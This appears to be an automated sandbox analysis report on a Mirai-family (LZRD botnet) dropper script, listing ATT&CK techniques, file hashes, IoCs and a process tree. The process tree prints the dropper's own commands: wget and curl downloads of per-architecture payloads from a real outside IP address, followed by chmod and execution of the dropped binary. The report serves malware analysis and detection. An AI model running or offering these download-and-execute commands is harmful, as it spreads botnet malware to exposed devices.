mirai | 5bac9d684357a86485310dc0f98b63f0f9c0f08e7879c7812a0949ff882fe7c4

Analysis

max time kernel
145s
max time network
147s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
26-12-2024 21:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

7c5ed3803ed430d1f19ad74fda51642f
SHA1

43d7c9d2e6065acbc7b1440a6e9a60bee8db353b
SHA256

5bac9d684357a86485310dc0f98b63f0f9c0f08e7879c7812a0949ff882fe7c4
SHA512

ff126662eb0097a5554f95a4b91c71481213e45f3f5a98a426ce49c7f15f32b422b2864cd97588d6360014e01e971003cfe1c63e58bc1bfadc38a4d150561565

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
769	chmod
838	chmod
916	chmod
927	chmod
878	chmod
910	chmod
922	chmod
933	chmod
904	chmod
775	chmod
788	chmod
815	chmod
883	chmod
889	chmod
895	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	770	Chaotic
/tmp/Chaotic	776	Chaotic
/tmp/Chaotic	789	Chaotic
/tmp/Chaotic	816	Chaotic
/tmp/Chaotic	839	Chaotic
/tmp/Chaotic	879	Chaotic
/tmp/Chaotic	884	Chaotic
/tmp/Chaotic	890	Chaotic
/tmp/Chaotic	896	Chaotic
/tmp/Chaotic	905	Chaotic
/tmp/Chaotic	911	Chaotic
/tmp/Chaotic	917	Chaotic
/tmp/Chaotic	923	Chaotic
/tmp/Chaotic	928	Chaotic
/tmp/Chaotic	934	Chaotic

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-5.dat	upx
behavioral3/files/fstream-6.dat	upx
behavioral3/files/fstream-7.dat	upx
behavioral3/files/fstream-8.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/5/status	Chaotic
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/229/status	Chaotic
File opened for reading	/proc/420/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/4/status	Chaotic
File opened for reading	/proc/13/status	Chaotic
File opened for reading	/proc/71/status	Chaotic
File opened for reading	/proc/842/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/75/status	Chaotic
File opened for reading	/proc/359/status	Chaotic
File opened for reading	/proc/839/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/21/status	Chaotic
File opened for reading	/proc/735/status	Chaotic
File opened for reading	/proc/741/status	Chaotic
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/327/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/10/status	Chaotic
File opened for reading	/proc/79/status	Chaotic
File opened for reading	/proc/80/status	Chaotic
File opened for reading	/proc/834/status	Chaotic
File opened for reading	/proc/667/status	Chaotic
File opened for reading	/proc/701/status	Chaotic
File opened for reading	/proc/720/status	Chaotic
File opened for reading	/proc/7/status	Chaotic
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/82/status	Chaotic
File opened for reading	/proc/381/status	Chaotic
File opened for reading	/proc/385/status	Chaotic
File opened for reading	/proc/737/status	Chaotic
File opened for reading	/proc/330/status	Chaotic
File opened for reading	/proc/730/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/37/status	Chaotic
File opened for reading	/proc/328/status	Chaotic
File opened for reading	/proc/671/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/11/status	Chaotic
File opened for reading	/proc/67/status	Chaotic
File opened for reading	/proc/77/status	Chaotic
File opened for reading	/proc/332/status	Chaotic
File opened for reading	/proc/18/status	Chaotic
File opened for reading	/proc/36/status	Chaotic
File opened for reading	/proc/109/status	Chaotic
File opened for reading	/proc/698/status	Chaotic
File opened for reading	/proc/736/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/73/status	Chaotic
File opened for reading	/proc/76/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
831	curl
837	cat
875	wget
876	curl
877	cat
818	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:738
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:745
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:765
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:768
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:770
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:772
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:774
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:776
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:778
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:779
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:786
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:788
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:789
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:792
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:803
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:813
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:815
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:816
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:818
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:831
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:837
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:839
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:875
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:876
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:877
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:879
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:880
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:882
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:884
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:886
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:888
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:890
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:892
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:894
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-ef27566b51d844db8c66878efff545e5-systemd-timedated.service-0a4lFA ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:896
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:898
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:899
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:903
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:905
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:907
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:908
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:909
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:911
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:913
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:914
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:915
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:917
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:919
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:920
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:921
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:923
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:924
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:925
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:926
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:927
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:928
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:930
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:931
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:932
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:934

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
cab2fc62b63f28cd95c3fdca9ecec6d0

SHA1
df33b92944b8436e7310b0a03ca9038b70c65a56

SHA256
8436a21f6e581d533cc9d3f9b292c89aa171b6c8f560f3baf666b00556b60871

SHA512
dd2bdb170092fc31e19e072f4b637ccff00a26ca59ddb4e02f01ff189d382c8f0b267eafd3b508ee9fffb076ac8204e2453a6769f7bb2a25b40fd043dd7d2224

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
8c12d2392db8546a0f1a870c8d8da4bb

SHA1
41857b0229bb9533a6e9949b30b593504ab05404

SHA256
c161ac5c4cf291df85f5aa76370cce82b05a99901821ef294052ab788e1e4479

SHA512
6c47d0d9c80681443b8fab1490ab9eb7081a5aa3242b26dc7e38789a1e8d8825b32b0e95209de17df338f15a6900e9d39e906005e9dc660f86292944209a3323

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
a1f76b42767974d8df0e46ae67cabd0f

SHA1
f8e929ce4a60ea8e8d471264d4ffbb1b3717d638

SHA256
7572e4b384752ae36079a75cf137b1a3599dd0ff1f31cb3a986926bb230cd8fb

SHA512
884f247c390aa06c023c7e398bf0ff80945371ad21683eee41c264b79f2cd5ff26b7dafb39fb85911c12b5b5310b702ef80b3933a1f35c0a3ad8b5b272541043

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
64fa0599b70a18403044c5ead883bb4a

SHA1
a36e9a7e4989cacce45ab21473fc96f450d1585a

SHA256
036a4c6d7e77446c407820f59b351b834aa4cb0c7d3075aed5830474bc355f90

SHA512
5b8738b611cf774d494dec0703e19c5fc54a246eb27e08c6f7a1a1be72aeccd5ee8bdb6916c0676a3bc6625954a91a6f02441ecc2903d7d5a5db072d2f323b85

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
bfa8c14219c81fedb6df65b1e34bf0cd

SHA1
44296a9b7a6c6169957746fcfeef10903d89c6c6

SHA256
09c681ef2234341e1ba972412d929cd4a4c1c0b5f486b7543008157a0efa7ecc

SHA512
8783c57a78de7d6a66644aa6ba895ae97b0b1825a0cab6a1741c2ed6f9b8226cbf7eb08e5ead6d7543320be1f3847ef1f98bdcb8f11e9c67d1ee17523d45ec0c

Download Submit
/tmp/busybox

Filesize
857KB

MD5
a39fe8036e559ce804e26518061e59ff

SHA1
8df27f6e8a48b762d945ea2f2b87390c80acd4de

SHA256
3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38

SHA512
e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
252405874b163d27f4b275dfdc52df3f

SHA1
7b854e1e3cbf34c4833e9efe5213596a5922e3a7

SHA256
d90c92338314e3a2dcc1beba3fe072b3b0223191753c6c368c0f87ee0f6a8e0b

SHA512
3f995f611199a8de9caa0e84072afaed4a8b70e204002edd5e306daec31ce6f8ae4af68232b0fb9bf64eef4e62a13695af91fe716460ba8f4119766d31193081

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads